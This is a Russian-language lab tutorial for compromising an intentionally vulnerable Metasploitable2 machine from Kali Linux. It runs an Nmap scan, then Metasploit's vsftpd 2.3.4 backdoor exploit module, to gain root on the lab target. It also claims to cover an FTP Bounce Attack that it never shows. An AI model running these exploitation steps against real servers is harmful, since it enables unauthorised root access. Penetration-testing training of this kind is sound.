Введение
В этом лабораторном занятии вы научитесь эксплуатировать уязвимости в службе Протокола передачи файлов (File Transfer Protocol, FTP) для несанкционированного доступа к целевой машине. Сценарий разворачивается в контексте кибербезопасности, где вы будете играть роль этического хакера, которому поручено выявить и эксплуатировать уязвимости уязвимого FTP-сервера.
Целью этого лабораторного занятия является получение root-доступа к целевой машине Metasploitable2 путем использования уязвимости FTP-службы и применения Metasploit Framework, популярного инструмента для пентестинга. В результате этого практического опыта вы получите более глубокое понимание FTP Bounce Attack, методов сканирования портов и процесса эксплуатации с использованием Metasploit.
Настройка лабораторной среды
На этом шаге вы настроите лабораторную среду, которая состоит из двух виртуальных машин: машины с Kali Linux в качестве машины-атакующего и машины Metasploitable2 в качестве целевой.
- Запустите виртуальную машину Metasploitable2, выполнив следующую команду в терминале:
sudo virsh start Metasploitable2
Подождите, пока целевая машина запустится, это может занять от 1 до 3 минут.
- Проверьте, что машина Metasploitable2 запущена, отправив ей ping:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить ping.
- Запустите контейнер с Kali Linux и войдите в его оболочку bash:
docker run -ti --network host b5b709a49cd5 bash
- Протестируйте сетевое соединение между контейнером с Kali Linux и машиной Metasploitable2:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить ping.
Теперь как машина-атакующий, так и целевая машина запущены, и вы можете приступить к пентестингу.
Примечание: Если вы случайно выйдете из текущей оболочки bash, контейнер с Kali автоматически остановится. Вы можете снова выполнить команду docker run -ti --network host b5b709a49cd5 bash на хост-машине, чтобы запустить новый контейнер с Kali и войти в оболочку bash для продолжения эксперимента.
Выполнение сканирования портов
На этом шаге вы будете использовать инструмент сканирования Nmap для определения открытых портов и запущенных служб на целевой машине Metasploitable2.
- Запустите службу базы данных PostgreSQL, которая требуется для работы Metasploit:
service postgresql start
- Инициализируйте базу данных Metasploit:
msfdb init
- Запустите консоль Metasploit Framework:
cd ~
msfconsole
- Используйте Nmap для сканирования целевой машины и определения открытых портов:
nmap -sV -T4 192.168.122.102
Опция -sV включает определение версий для открытых портов, а -T4 устанавливает политику времени для более быстрого сканирования.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Эксплуатация уязвимости FTP-сервиса
На этом шаге вы будете использовать выявленную уязвимость FTP-службы для несанкционированного доступа к целевой машине Metasploitable2.
- Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
- Найдите модуль сканера FTP в Metasploit:
search scanner/ftp
- Используйте модуль
ftp_versionдля сканирования FTP - службы:
use auxiliary/scanner/ftp/ftp_version
- Установите целевой хост для сканирования:
set RHOSTS 192.168.122.102
- Запустите сканирование версии FTP:
exploit
- На основе определенной версии FTP найдите соответствующий модуль эксплойта:
search vsFTPd
- Используйте модуль
vsftpd_234_backdoorдля эксплуатации уязвимости:
use exploit/unix/ftp/vsftpd_234_backdoor
- Установите целевой хост для эксплойта:
set RHOST 192.168.122.102
- Выполните эксплойт:
exploit
Нажмите Ctrl + D, чтобы выйти из консоли Metasploit, а затем начните проверку
Проверка успешной эксплуатации
На этом шаге вы проверите, что эксплуатация прошла успешно и вы получили root-доступ к целевой машине Metasploitable2.
- Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
- Проверьте текущего пользователя:
whoami
- Проверьте имя хоста скомпрометированной машины:
hostname
- Проверьте IP - адрес скомпрометированной машины:
ifconfig
Нажмите Ctrl + D, чтобы выйти из консоли Metasploit, а затем начните проверку
Резюме
В этой лабораторной работе вы научились эксплуатировать уязвимость FTP-службы для несанкционированного доступа к целевой машине. Вы настроили лабораторную среду с уязвимой машиной Metasploitable2 и машиной-атакующим с Kali Linux. Вы выполнили сканирование портов с использованием Nmap для определения открытых портов и служб, а затем воспользовались Metasploit Framework для эксплуатации выявленной уязвимости FTP-службы. Наконец, вы проверили успешность эксплуатации, проверив текущего пользователя, имя хоста и IP-адрес скомпрометированной машины.
Благодаря этому практическому опыту вы приобрели практические знания и навыки в выявлении и эксплуатации уязвимостей, использовании популярных инструментов кибербезопасности, таких как Nmap и Metasploit, а также понимании техники FTP Bounce Attack. Эти навыки являются обязательными для этических хакеров и профессионалов в области кибербезопасности для оценки и укрепления безопасности систем и сетей.



